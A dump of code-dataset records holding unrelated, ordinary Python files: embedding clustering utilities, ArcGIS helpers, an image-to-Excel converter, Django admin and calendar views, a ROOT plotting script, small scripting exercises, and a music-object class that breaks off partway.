\"\"\"\n\n embeddings = []\n\n self.model.eval()\n\n with torch.no_grad():\n for data in dataloader:\n\n if isinstance(data, tuple) or isinstance(data, list):\n data = data[0]\n\n data = 
data.to(self.device)\n\n                z = self.model.encode(data).cpu()\n\n                # encode() may return a tuple or a list; keep only the embedding tensor\n                if isinstance(z, tuple) or isinstance(z, list):\n                    z = z[0]\n\n                embeddings.append(z.detach().numpy())\n\n        embeddings = np.concatenate(embeddings)\n\n        return embeddings\n\n    def build_unlabelled_embeddings(self):\n        \"\"\"Builds the embedding for the unlabelled dataset\"\"\"\n        self.unlabelled_embeddings = self.get_embeddings(\n            self.unlabelled_loader)\n\n    def build_train_embeddings(self):\n        \"\"\"Builds the embedding for the training labelled dataset\"\"\"\n        self.train_embedding = self.get_embeddings(self.train_loader)\n\n    def build_valid_embeddings(self):\n        \"\"\"Builds the embedding for the validation labelled dataset\"\"\"\n        self.valid_embedding = self.get_embeddings(self.valid_loader)\n\n    def build_embeddings(self):\n        \"\"\"Builds all necessary embeddings\"\"\"\n        self.build_unlabelled_embeddings()\n        self.build_train_embeddings()\n        self.build_valid_embeddings()\n\n\nclass ClusterCollection:\n    \"\"\"\n    Contains a collection of clustering algorithms,\n    along with a ClusterHelper object to avoid repetition.\n    \"\"\"\n\n    def __init__(self, models, model, device, unlabelled_loader, train_loader,\n                 valid_loader):\n\n        self.cluster_helper = ClusterHelper(\n            model,\n            device,\n            unlabelled_loader,\n            train_loader,\n            valid_loader\n        )\n\n        self.models = {\n            key: ClusterModel(value, self.cluster_helper)\n            for key, value in models.items()\n        }\n\n    def full_fit(self):\n        \"\"\"\n        Performs the full fit on every clustering model.\n        \"\"\"\n\n        self.cluster_helper.build_embeddings()\n\n        for model in self.models.values():\n            t0 = time()\n            print('Fitting Model: {}'.format(model.model), end='... ')\n            model.full_fit()\n            print('Done. Time elapsed : {:.3f}s.'.format(time() - t0))\n\n    def get_clustering_metrics(self):\n        \"\"\"\n        Gets the clustering metrics for each model.\n\n        Returns:\n            other_metrics (dict): A dictionary containing the metric for each model.\n        \"\"\"\n\n        clustering_metrics = {\n            'ARI': metrics.adjusted_rand_score,\n            'mutual_info': metrics.adjusted_mutual_info_score,\n            'homogeneity': metrics.homogeneity_score,\n            'completeness': metrics.completeness_score,\n            'F1': metrics.f1_score,\n            'accuracy': metrics.accuracy_score,\n            'recall': metrics.recall_score\n        }\n\n        other_metrics = {}\n\n        for key, model in self.models.items():\n\n            cluster_predict = model.predict(\n                self.cluster_helper.valid_embedding)\n            label_predict = model.labelled_predict(\n                self.cluster_helper.valid_embedding)\n            labels = self.cluster_helper.valid_labels\n\n            for name, metric in clustering_metrics.items():\n\n                if name in {'F1', 'recall'}:\n                    other_metrics['{}-{}'.format(key, name)] = metric(labels,\n                                                                      label_predict,\n                                                                      average='weighted')\n                elif name == 'accuracy':\n                    other_metrics['{}-{}'.format(key, name)] = metric(labels,\n                                                                      label_predict)\n                elif name == 'mutual_info':\n                    other_metrics['{}-{}'.format(key, name)] = metric(labels,\n                                                                      cluster_predict,\n                                                                      average_method='arithmetic')\n                else:\n                    other_metrics['{}-{}'.format(key, name)] = metric(labels,\n                                                                      cluster_predict)\n\n                print('{}-{}: {}'.format(key, name, other_metrics[\n                    '{}-{}'.format(key, name)]))\n\n        return other_metrics\n\n\nclass MajorityVote(object):\n\n    def __init__(self, models):\n        \"\"\"\n        Args:\n            models (list of ClusterModels): Pre-trained ClusterModel objects.\n        \"\"\"\n\n        self.models = models\n\n        for model in self.models:\n            del model.cluster_helper\n\n    def labelled_predict(self, x):\n        \"\"\"\n        Returns a majority vote for each row of x.\n\n        Args:\n            x (np.array): Array of embeddings.\n\n        Returns:\n            prediction (np.array): 1D array of predictions.\n        \"\"\"\n\n        predictions = np.stack([\n            model.labelled_predict(x)\n            for model in self.models\n        ], axis=1)\n\n        def get_vote(row):\n            \"\"\"\n            Gets the vote from a row of prediction.\n            In case of ties, returns a random choice.\n\n            Args:\n                row (np.array): A row of a numpy array.\n\n            Returns:\n                vote (int): The majority vote\n            \"\"\"\n\n            uniques, counts = np.unique(row, return_counts=True)\n\n            counts = counts[uniques != -1]\n            uniques = uniques[uniques != -1]\n\n            if len(counts) == 0:\n                return -1\n\n            uniques = uniques[counts == counts.max()]\n\n            return np.random.choice(uniques)\n\n        prediction = np.array([\n            get_vote(row)\n            for row in predictions\n        ])\n\n        return prediction\n","repo_name":"josephdviviano/horoma","sub_path":"utils/clusters.py","file_name":"clusters.py","file_ext":"py","file_size_in_byte":9706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"8792675691","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\nMichael D. Troyer\n\nmtroyer@blm.gov\n719-269-8587\n\"\"\"\n\n\nimport csv\nimport os\nimport arcpy\n\n\ndef blast_my_cache():\n \"\"\"\n Delete in memory tables and feature classes\n reset to original workspace when done\n \"\"\"\n\n # get the original workspace location\n orig_workspace = arcpy.env.workspace\n \n # Set the workspace to in_memory\n arcpy.env.workspace = \"in_memory\"\n # Delete all in memory feature classes\n fcs = arcpy.ListFeatureClasses()\n if len(fcs) > 0:\n for fc in fcs:\n arcpy.Delete_management(fc)\n # Delete all in memory tables\n tbls = arcpy.ListTables()\n if len(tbls) > 0:\n for tbl in tbls:\n arcpy.Delete_management(tbl)\n\n # Reset the workspace\n arcpy.env.workspace = orig_workspace\n\n\ndef find_files(folder, ext, prefix=None):\n \"\"\"\n Check the input for files of type and optionally matching\n and return a list of the full file paths of each matching file.\n Inputs:\n :folder: str - full file path to a directory\n :ext: str - extension file type\n :prefix: str - prefix to match\n \"\"\"\n matches = []\n files = os.listdir(folder)\n for f in files:\n if os.path.splitext(f)[1] == ext:\n if prefix:\n if f.startswith(prefix):\n matches.append(os.path.join(folder, f))\n else:\n matches.append(os.path.join(folder, f))\n return matches\n\n\ndef add_fields_from_csv(csv_file, target):\n \"\"\"\n Reads a csv file for feature class or table attribute data and add attribute fields.\n \"\"\"\n with open(csv_file, 'r') as f:\n csv_reader = csv.reader(f)\n headers = next(csv_reader)\n for row in csv_reader:\n attribute_desc = {header: value for header, value in zip(headers, row)}\n arcpy.AddField_management(\n in_table=target,\n field_name=attribute_desc['NAME'],\n field_type=attribute_desc['TYPE'],\n field_precision=attribute_desc['PRECISION'],\n field_scale=attribute_desc['SCALE'],\n field_length=attribute_desc['LENGTH'],\n field_alias=attribute_desc['ALIAS'],\n field_is_nullable=attribute_desc['ISNULLABLE'],\n field_is_required=attribute_desc['REQUIRED'],\n field_domain=attribute_desc['DOMAIN'],\n )","repo_name":"MichaelTroyer/ArcGIS_Build_AGOL_Database","sub_path":"helpers/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"21933075516","text":"import cv2\r\nfrom win32com.client import Dispatch\r\nfrom contextlib import contextmanager\r\nimport time\r\nimport os\r\nimport logging\r\nimport argparse\r\n\r\nMAX_WIDTH = 312\r\nMAX_HEIGHT = 386\r\n\r\n\r\ndef get_image(path, width=100, height=100):\r\n image = cv2.imread(path, cv2.IMREAD_COLOR)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n width = min(MAX_WIDTH, width)\r\n height = min(MAX_HEIGHT, height)\r\n new_image = cv2.resize(image, (width, height))\r\n return new_image\r\n\r\ndef get_image_scale(path, higher_dim=min(MAX_WIDTH, MAX_HEIGHT)):\r\n image = cv2.imread(path, cv2.IMREAD_COLOR)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n dimensions = image.shape\r\n current_height, current_width, _ = dimensions\r\n scale = current_height/current_width\r\n\r\n ratio = current_width/current_height\r\n if scale > 1: # height > width\r\n height = int(higher_dim)\r\n width = int(higher_dim * (current_height/current_width) ** -1)\r\n else:\r\n width = int(higher_dim)\r\n height = int(higher_dim * (current_height/current_width))\r\n new_image = cv2.resize(image, (width, height))\r\n return new_image\r\n\r\n\r\ndef image_toRGBdict(image):\r\n col, row, _ = image.shape\r\n pixels = {}\r\n for c in range(col):\r\n for r in range(row):\r\n pixel = (c, r)\r\n pixels[pixel] = rgb_to_hex(tuple(image[c][r])[::-1])\r\n return pixels\r\n\r\ndef rgb_to_hex(rgb):\r\n strvalue = '%02x%02x%02x' % rgb\r\n ivalue = int(strvalue, 16)\r\n return ivalue\r\n\r\ndef write_to_excel(rgbs: dict, save_as: str, worksheet: str='Sheet1') -> None:\r\n\r\n @contextmanager\r\n def open_excel(path: str):\r\n col_start = 1\r\n col_end = 1000\r\n app = Dispatch('Excel.Application')\r\n app.Visible = False\r\n app.DisplayAlerts = False\r\n workbook = app.Workbooks.Add()\r\n for x in range(col_start, col_end):\r\n workbook.Worksheets['Sheet1'].Columns(x).ColumnWidth = 2\r\n yield workbook\r\n workbook.SaveAs(path)\r\n app.DisplayAlerts = True\r\n app.Quit()\r\n\r\n with open_excel(save_as) as wb:\r\n s = wb.Worksheets(worksheet)\r\n for cell_addr, cell_rgb in rgbs.items():\r\n row, col = cell_addr\r\n row += 1\r\n col += 1\r\n s.Cells(row, col).Interior.Color = cell_rgb\r\n return\r\n\r\n\r\ndef image_to_excel(image_path, save_as, worksheet='Sheet1', do_scaling=True, scale=250, height=100, width=100):\r\n MAX_FORMATS = 65490 # hardcoded limit; see support.microsoft.com/en-us/office/excel-specifications-and-limits-1672b34d-7043-467e-8e27-269d656771c3\r\n if do_scaling:\r\n image = get_image_scale(image_path, higher_dim=scale)\r\n else:\r\n image = get_image(image_path, height=height, width=width)\r\n rgb_dict = image_toRGBdict(image)\r\n if len(set(rgb_dict.values())) > MAX_FORMATS:\r\n raise ValueError(\"Error -- more cell formats than excel will allow (max is {})\".format(MAX_FORMATS))\r\n write_to_excel(rgb_dict, save_as)\r\n\r\n\r\ndef pic_dir_to_excel_dir(pic_dir, excel_dir, do_scaling=True, scale=250, width=100, height=100):\r\n assert os.path.isdir(pic_dir)\r\n assert os.path.isdir(excel_dir)\r\n for file in os.listdir(pic_dir):\r\n print('Processing {}...'.format(file))\r\n try:\r\n file_path = os.path.join(pic_dir, file)\r\n file_name, _ = file.split('.')\r\n save_as = os.path.join(excel_dir, '{}.xlsx'.format(file_name))\r\n image_to_excel(file_path, save_as, do_scaling=do_scaling, scale=scale, height=height, width=width)\r\n except BaseException as e:\r\n print('Error processing file {}. 
Proceeding to next file'.format(file))\r\n logging.error(e)\r\n\r\n\r\ndef multiprocess(pics, excel_dir=None, do_scaling=True, scale=250, width=None, height=None):\r\n import os\r\n import multiprocessing\r\n\r\n if not excel_dir:\r\n excel_dir = os.getcwd()\r\n\r\n if do_scaling:\r\n assert scale\r\n assert not width\r\n assert not height\r\n else:\r\n assert not scale\r\n assert width\r\n assert height\r\n\r\n jobs = []\r\n if os.path.isdir(pics):\r\n for file in os.listdir(pics):\r\n print('Starting {}...'.format(file))\r\n file_path = os.path.join(pics, file)\r\n file_name, _ = file.split('.')\r\n save_as = os.path.join(excel_dir, '{}.xlsx'.format(file_name))\r\n p = multiprocessing.Process(target=image_to_excel, args=(file_path, save_as, None, do_scaling, scale, height, width))\r\n p.start()\r\n jobs.append(p)\r\n\r\n for job in jobs:\r\n job.join()\r\n\r\n elif os.path.isfile(pics):\r\n file_name, _ = pics.split('.')\r\n save_as = os.path.join(excel_dir, '{}.xlsx'.format(file_name))\r\n p = multiprocessing.Process(target=image_to_excel, args=(pics, save_as, None, do_scaling, scale, height, width))\r\n p.start()\r\n p.join()\r\n\r\n else:\r\n raise ValueError(\"Error -- 'pics' argument (currently '{}') must be either file or directory\".format(pics))\r\n\r\n\r\nif __name__ == '__main__':\r\n pics = r\"C:\\Users\\paul_\\PycharmProjects\\Picxel\\Pictures\"\r\n save_dir = r\"C:\\Users\\paul_\\PycharmProjects\\Picxel\\Workbooks\"\r\n test = r\"C:\\Users\\paul_\\PycharmProjects\\Picxel\\Pictures\\david.jpg\"\r\n\r\n parser = argparse.ArgumentParser(description='Pixelate image(s) to Excel')\r\n parser.add_argument(\"--scale\", default=200, type=int)\r\n parser.add_argument('picture', help='picture file OR directory in which pictures are stored')\r\n parser.add_argument('save', help=\"directory in which completed excel workbooks should be saved\")\r\n args = parser.parse_args()\r\n\r\n assert os.path.isdir(args.save)\r\n\r\n picture = os.path.abspath(args.picture)\r\n save = os.path.abspath(args.save)\r\n scale = args.scale\r\n\r\n import time\r\n start_time = time.time()\r\n multiprocess(picture, save, scale=scale)\r\n end_time = time.time()\r\n runtime = end_time - start_time\r\n print('{} seconds elapsed'.format(runtime))","repo_name":"PaulWendt96/Pixcel","sub_path":"Pixcelize.py","file_name":"Pixcelize.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"3528340308","text":"from django.contrib import admin\nfrom django.utils.safestring import mark_safe\nfrom django_audit_fields.admin import audit_fieldset_tuple\nfrom edc_crf.admin import crf_status_fieldset_tuple\nfrom edc_form_label.form_label_modeladmin_mixin import FormLabelModelAdminMixin\nfrom edc_model_admin import SimpleHistoryAdmin, TabularInlineMixin\n\nfrom inte_subject.forms import DrugSupplyDmForm\n\nfrom ..admin_site import inte_subject_admin\nfrom ..forms import DrugRefillDmForm\nfrom ..models import DrugRefillDm, DrugSupplyDm\nfrom .modeladmin_mixins import CrfModelAdminMixin, DrugSupplyInlineMixin\n\n\nclass DrugSupplyDmInline(DrugSupplyInlineMixin, TabularInlineMixin, admin.TabularInline):\n\n model = DrugSupplyDm\n form = DrugSupplyDmForm\n min_num = 1\n insert_after = \"return_in_days\"\n\n def get_formset(self, request, obj=None, **kwargs):\n formset = super().get_formset(request, obj=None, **kwargs)\n formset.validate_min = True\n return formset\n\n\n@admin.register(DrugRefillDm, site=inte_subject_admin)\nclass DrugRefillDmAdmin(CrfModelAdminMixin, FormLabelModelAdminMixin, SimpleHistoryAdmin):\n form = DrugRefillDmForm\n\n additional_instructions = mark_safe(\n 'Note: Medications CRF must be completed first. '\n )\n\n inlines = [DrugSupplyDmInline]\n\n fieldsets = (\n (None, {\"fields\": (\"subject_visit\", \"report_datetime\")}),\n (\n \"Diabetes Drug Refill Today\",\n {\n \"fields\": (\n \"rx\",\n \"rx_other\",\n \"rx_modified\",\n \"modifications\",\n \"modifications_other\",\n \"modifications_reason\",\n \"modifications_reason_other\",\n \"return_in_days\",\n )\n },\n ),\n crf_status_fieldset_tuple,\n audit_fieldset_tuple,\n )\n filter_horizontal = [\"rx\", \"modifications\", \"modifications_reason\"]\n\n radio_fields = {\n \"crf_status\": admin.VERTICAL,\n \"rx_modified\": admin.VERTICAL,\n }\n","repo_name":"inte-africa-trial/inte-edc","sub_path":"inte_subject/admin/drug_refill_dm_admin.py","file_name":"drug_refill_dm_admin.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"26282313337","text":"#!/usr/bin/env python\n\nimport sys\n\nimport logging\nlogging.basicConfig(level=logging.INFO,\n format='%(levelname)s - %(funcName)s: %(message)s')\n\nimport ROOT as r\nr.PyConfig.IgnoreCommandLineOptions = True\n\nfrom utils.recurse import collectGraphs\nfrom utils.plotHelpers import mkplot, _defaultColors\n\n# global array of rootfiles, to avoid getting them closed on going out of scope\n_open_files = []\n\ndef collect_graphs(inputfiles):\n \"\"\"Collect all the graphs from the input files\"\"\"\n graphs = {}\n global _open_files\n for inf in inputfiles:\n logging.debug('Opening file {}'.format(inf))\n f = r.TFile.Open(inf)\n _open_files.append(f)\n\n graphs[inf] = collectGraphs(f)\n\n logging.debug('Collected {} graphs'.format(len(graphs[inf])))\n\n return graphs\n\n\ndef parse_file_name(filename):\n \"\"\"Get the bin threshold and the number of bins from the filename\"\"\"\n import re\n rgx = r'bin_thresh_([0-9]+).*n_bins_([0-9]+)'\n m = re.search(rgx, filename)\n if m:\n logging.debug('Matching \\'{}\\' to \\'{}\\' worked: {}'.format(rgx, filename, m.groups()))\n return [int(m.group(i)) for i in [1,2]]\n\n logging.warning('Could not match \\'{}\\' to \\'{}\\''.format(rgx, filename))\n return -1,-1\n\n\ndef select_graphs(graphs, sel_str):\n \"\"\"From the graphs of all files select the ones matching\"\"\"\n from utils.miscHelpers import filterDict\n\n logging.debug('Selecting graphs matching \\'{}\\''.format(sel_str))\n sel_graphs = {}\n for inf in graphs:\n sel_cands = filterDict(graphs[inf], sel_str).values()\n logging.debug('Found {} matching graphs in \\'{}\\''.format(len(sel_cands), inf))\n if len(sel_cands) == 0:\n logging.warning('Could not get graphs matching \\'{}\\' '\n 'from file {}'.format(sel_str, inf))\n continue\n if len(sel_cands) > 1:\n # sort by length, since '_scan' is appended to the files\n sel_cands.sort(key=lambda x: len(x.GetName()))\n logging.info('Found {} graphs matching \\'{}\\' '\n 'in file {}, selecting {}'.format(len(sel_cands), sel_str,\n inf, sel_cands[0]))\n logging.debug('Other candidates were {}'.format(sel_cands[1:]))\n\n sel_graphs[inf] = sel_cands[0]\n\n logging.debug('Selected {} graphs for {} files'.format(len(sel_graphs), len(graphs)))\n return sel_graphs\n\n\ndef sort_graphs(graphs):\n \"\"\"Sort the graphs according to the bin threshold and then number of bins\"\"\"\n # first create a list of tuples so that keys and values stick together but\n # are orderable\n from operator import itemgetter\n\n logging.debug('Sorting graphs. 
Creating sorting list of tuple')\n gtuples = zip((parse_file_name(k) for k in graphs.keys()), graphs.values())\n\n gtuples.sort(key=itemgetter(0,1))\n logging.debug('Done sorting graphs')\n\n return (g[0] for g in gtuples), (g[1] for g in gtuples)\n\n\ndef set_marker_styles(graphs):\n \"\"\"\n Set different marker styles, such that each marker - color\n combination is present only once\n \"\"\"\n n_colors = len(_defaultColors())\n marker_styles = (20, 21, 22, 34, 47, 23, 33)\n\n for i, g in enumerate(graphs):\n i_col = (i + 1) / n_colors\n g.SetMarkerStyle(marker_styles[i_col])\n g.SetMarkerSize(1.5)\n\n\ndef set_line_styles(graphs):\n \"\"\"\n Set different line styles, such that each line - color combination\n is present only once\n \"\"\"\n n_colors = len(_defaultColors())\n line_styles = (1, 2, 8, 6)\n\n for i, g in enumerate(graphs):\n i_col = (i + 1) / n_colors\n g.SetLineStyle(line_styles[i_col])\n g.SetLineWidth(2)\n\n\ndef plot_graphs(graphs, sel_str, plotname, contour, ranges):\n \"\"\"Plot all graphs matching the sel_str\"\"\"\n logging.debug('Creating plot for sel_str = \\'{}\\''.format(sel_str))\n sel_graphs = select_graphs(graphs, sel_str)\n logging.debug('Got {} graphs'.format(len(sel_graphs)))\n\n binnings, graphs = sort_graphs(sel_graphs)\n graphs = list(graphs) # need a list in any case\n\n if not contour:\n set_marker_styles(graphs)\n draw_opt = 'PE'\n else:\n set_line_styles(graphs)\n draw_opt='L'\n\n make_leg = lambda x: 'thresh = {}, bins = {}'.format(x[0], x[1])\n\n mkplot(graphs,\n legEntries=[make_leg(b) for b in binnings],\n xRange=ranges[0], yRange=ranges[1],\n saveAs=plotname, grid=True, drawOpt=draw_opt,\n legPos='botleft', yLabel='#Delta_{#lambda}', xLabel='#lambda_{ref}')\n\n\ndef main(inputfiles, contour, errorbars, outbase, errlevel, axis_ran_str=''):\n \"\"\"Main\"\"\"\n # collect all graphs and then handle them according to args\n logging.info('Collecting graphs from {} files'.format(len(inputfiles)))\n all_graphs = collect_graphs(inputfiles)\n\n err_rgx = r'errlevel_' + errlevel.replace('.', '\\.')\n\n if axis_ran_str:\n logging.debug('Getting axis ranges from {}'.format(axis_ran_str))\n ranges = [float(v) for v in axis_ran_str.split(',')]\n if len(ranges) < 4:\n print('Could not get 4 values from {}'.format(axis_ran_str))\n sys.exit(1)\n\n axis_ranges = []\n axis_ranges.append([ranges[0], ranges[1]])\n axis_ranges.append([ranges[2], ranges[3]])\n logging.debug('Axis ranges are: {} and {}'.format(axis_ranges[0],\n axis_ranges[1]))\n\n else:\n axis_ranges = [None, None]\n\n if contour:\n plotname = outbase + '_contour.pdf'\n logging.info('Making contour plot \\'{}\\''.format(plotname))\n plot_graphs(all_graphs, r'contour.*' + err_rgx, plotname, True, axis_ranges)\n\n if errorbars:\n plotname = outbase +'_central.pdf'\n logging.info('Making central results plot \\'{}\\''.format(plotname))\n plot_graphs(all_graphs, r'fit.*' + err_rgx, plotname, False, axis_ranges)\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='Script for creating plots comparing'\n ' different uncertainty shapes')\n parser.add_argument('inputfiles', nargs='+', help='input files to use')\n parser.add_argument('-o', '--outbase', default='fit_results',\n help='base name for the output plots')\n parser.add_argument('-c', '--contour', default=True, action='store_true',\n help='make plot with contours')\n parser.add_argument('-nc', '--nocontour', dest='contour', action='store_false',\n help='do not make plot with contours')\n 
parser.add_argument('-e', '--errorbars', default=False, action='store_true',\n help='make plot with errorbars')\n parser.add_argument('-ne', '--noerrorbars', dest='errorbars', action='store_false',\n help='do not make plot with errorbars')\n parser.add_argument('-l', '--errlevel', type=str, default='1.00',\n help='desired error level (has to be present in files)')\n parser.add_argument('-z', '--zoom', help='zoom into desired region', default='')\n\n args = parser.parse_args()\n\n r.gROOT.SetBatch()\n r.gROOT.ProcessLine('gErrorIgnoreLevel = 1001')\n\n main(args.inputfiles, args.contour, args.errorbars, args.outbase, args.errlevel,\n args.zoom)\n","repo_name":"tmadlener/NewPolFramework","sub_path":"polFit/make_contour_comp_plots.py","file_name":"make_contour_comp_plots.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"24984512172","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n----------------------------------------------------------------------------------------------------\n* Project Name : SQL_memOJi\n* File Name : views.py\n* Description : \n* Create Time : 2021-04-04 00:48:04\n* Version : 1.0\n* Author : Steve X\n* GitHub : https://github.com/Steve-Xyh/SQL_memOJi\n----------------------------------------------------------------------------------------------------\n* Notice\n- \n- \n----------------------------------------------------------------------------------------------------\n'''\n\nimport json\nfrom django.shortcuts import render\nimport datetime\nfrom user.models import Student, User, Classroom\nfrom coding.models import Exam,Exercise\n#XXX(Seddon):默认按照中国时区\nclass DateEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj,datetime.datetime):\n return obj.strftime(\"%Y-%m-%d %H:%M:%S\")\n else:\n return json.JSONEncoder.default(self,obj)\n\ndef calendar(request):\n '''Render calendar template'''\n identity = request.user.identity()\n print(identity)\n if request.user.is_superuser: # 超级用户可查看所有数据\n conditions = {\n 'active' : True\n }\n exams_list = Exam.objects.order_by('publish_time').filter(**conditions)\n exer_list = Exercise.objects.order_by('publish_time').filter(**conditions)\n elif identity == 'teacher':\n conditions = {\n 'classroom__in' : request.user.teacher.teach_room(),\n 'active' : True\n }\n exams_list = Exam.objects.order_by('publish_time').filter(**conditions)\n exer_list = Exercise.objects.order_by('publish_time').filter(**conditions)\n elif identity == 'teacher_student':\n conditions_teacher = {\n 'classroom__in' : request.user.teacher.teach_room(),\n 'active' : True\n }\n conditions_student = {\n 'classroom' : request.user.student.classroom,\n 'active' : True\n }\n exams_list_teacher = Exam.objects.order_by('publish_time').filter(**conditions_teacher)\n exer_list_teacher = Exercise.objects.order_by('publish_time').filter(**conditions_teacher)\n exams_list_student = Exam.objects.order_by('publish_time').filter(**conditions_student)\n exer_list_student = Exercise.objects.order_by('publish_time').filter(**conditions_student)\n exams_list = exams_list_teacher | exams_list_student\n exer_list = exer_list_teacher | exer_list_student\n elif identity == 'student':\n conditions = {\n 'classroom' : request.user.student.classroom,\n 'active' : True\n }\n exams_list = Exam.objects.order_by('publish_time').filter(**conditions)\n exer_list = Exercise.objects.order_by('publish_time').filter(**conditions)\n else:\n exams_list = Exam.objects.none()\n exer_list = Exercise.objects.none()\n\n content = {\n 'exams_list': exams_list,\n 'exer_list': exer_list,\n }\n calc_list = []\n # {% url 'coding:coding-editor' 'exam' exam.exam_id exam.first_ques %}\n for exam in exams_list:\n calc_list.append({'title':exam.exam_name,'start':exam.start_time + datetime.timedelta(hours=8),'end':exam.end_time + datetime.timedelta(hours=8), 'url':\"/coding/coding-editor/exam/\" + str(exam.exam_id )+ \"/\" + str(exam.first_ques)})\n for exer in exer_list:\n # calc_list.append({'title':exer.exer_name,'start':exer.publish_time + datetime.timedelta(hours=8)})\n calc_list.append({'title':exer.exer_name,'start':exer.start_time + datetime.timedelta(hours=8),'end':exer.end_time + datetime.timedelta(hours=8), 'url':\"/coding/coding-editor/exer/\" + str(exer.exer_id )+ \"/\" + str(exer.first_ques)})\n return render(request, 'iCalendar/calendar.html', 
{'spots':json.dumps(calc_list,cls=DateEncoder)})","repo_name":"Steve-Xyh/SQL_memOJi","sub_path":"src/iCalendar/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"}
+{"seq_id":"36449203400","text":"import openpyxl\n\n# 1. 엑셀 파일 열기\nworkbook = openpyxl.load_workbook('data.xlsx')\n# 현재 활성 중인 워크시트를 선택하는 방법\nworksheet = workbook.active\n\n# 2. 데이터 읽어서 딕셔너리 만들기\nresult_dic = {}\nfor row in worksheet.iter_rows(min_row=1, values_only=True):\n key = str(row[0]) + \"#\" + str(row[1])\n values = str(row[2]).split('\\n') if row[2] else ['']\n result_dic[key] = values\n\n# 3. 딕셔너리 출력하기\nprint(result_dic)\n\n# 4. 결과 엑셀 파일 쓰기\noutput_workbook = openpyxl.Workbook()\noutput_worksheet = output_workbook.active\nfor key, values in result_dic.items():\n for value in values:\n if value:\n output_worksheet.append([key, value])\n else:\n output_worksheet.append([key, \"\"])\n\noutput_workbook.save('output.xlsx')","repo_name":"happyhillll/work","sub_path":"intothecodingworld/task02/task02_minkyeong.py","file_name":"task02_minkyeong.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"35982716957","text":"# Creating new instances of class objects can be a great way to keep track of values using attributes associated with the object.\n# The values of these attributes can be easily changed at the object level. The following code illustrates a famous quote by George Bernard Shaw, using objects to represent people.\n# Fill in the blanks to make the code satisfy the behavior described in the quote.\n\nclass Person():\n apples = 0\n ideas = 0\n\n\njohanna = Person()\njohanna.apples = 1\njohanna.ideas = 1\n\nmartin = Person()\nmartin.apples = 2\nmartin.ideas = 1\n\n\ndef exchange_apples(you, me):\n temp = you.apples\n you.apples = me.apples\n me.apples = temp\n return you.apples, me.apples\n\n\ndef exchange_ideas(you, me):\n temp = you.ideas\n you.ideas += me.ideas\n me.ideas += temp\n return you.ideas, me.ideas\n\n\nexchange_apples(johanna, martin)\nprint(\"Johanna has {} apples and Martin has {} apples\".format(johanna.apples, martin.apples))\nexchange_ideas(johanna, martin)\nprint(\"Johanna has {} ideas and Martin has {} ideas\".format(johanna.ideas, martin.ideas))\n","repo_name":"AbuBakkar32/Machine-Learning-Practice","sub_path":"Coursera Certification Course/Google Crash Course Python/Function (OOP)/Function Practice/Practice 5.py","file_name":"Practice 5.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"}
+{"seq_id":"16642222208","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: HJK\n@file: music.py\n@time: 2019-01-27\n\nmusic object\n\n\"\"\"\n\nimport os\nimport re\nimport datetime\nimport logging\nimport click\nimport requests\nfrom . import config\nfrom .utils import colorize\n\n\nclass Music:\n \"\"\"\n 定义music对象,\n 包括基本属性(如title,singer,url等)\n 以及一些方法(如download,info等)\n \"\"\"\n\n def __init__(self):\n self.idx = 0\n self.id = \"\"\n self.title = \"\"\n self.ext = \"mp3\"\n self.singer = \"\"\n self.album = \"\"\n self.size = \"\"\n self.rate = \"\"\n self.source = \"\"\n self.lyrics = \"\"\n self.cover = \"\"\n self._duration = \"\"\n self._url = \"\"\n self.outdir = config.get(\"outdir\")\n self.verbose = config.get(\"verbose\")\n self.logger = logging.getLogger(__name__)\n\n def __str__(self):\n \"\"\" 在打印详情时调用 \"\"\"\n idx = colorize(\"[ %s ] \" % self.idx, \"cyan\")\n source = colorize(\"%s\" % self.source.upper(), self.source)\n return \"\\n ------------ \\n\" + _(\n \" -> 来源: {idx}{source} #{id}\\n\"\n \" -> 歌曲: {title}\\n\"\n \" -> 歌手: {singer}\\n\"\n \" -> 专辑: {album}\\n\"\n \" -> 时长: {duration}\\n\"\n \" -> 大小: {size}MB\\n\"\n \" -> 比特率: {rate}\\n\"\n \" -> URL: {url} \\n\"\n \" -> 歌词: {lyrics} \\n\"\n \" -> 封面: {cover} \\n\"\n ).format(\n idx=idx,\n source=source,\n id=self.id,\n title=self.title,\n singer=self.singer,\n album=self.album,\n duration=self.duration,\n size=self.size,\n rate=self.rate,\n url=self.url,\n lyrics=self.lyrics,\n cover=self.cover,\n )\n\n @property\n def avaiable(self):\n \"\"\" 是否有效,如果URL为None或大小为0则无效 \"\"\"\n return self.url and self.size\n\n @property\n def name(self):\n \"\"\" 歌曲文件名 \"\"\"\n return \"%s - %s.%s\" % (self.singer, self.title, self.ext)\n\n @property\n def duration(self):\n \"\"\" 持续时间 H:M:S \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, seconds):\n self._duration = str(datetime.timedelta(seconds=int(seconds)))\n\n @property\n def info(self):\n \"\"\" 歌曲摘要信息,列出搜索歌曲时使用 \"\"\"\n idx = colorize(\" [ %2s ] \" % self.idx, \"cyan\")\n source = colorize(\"%7s\" % self.source.upper(), 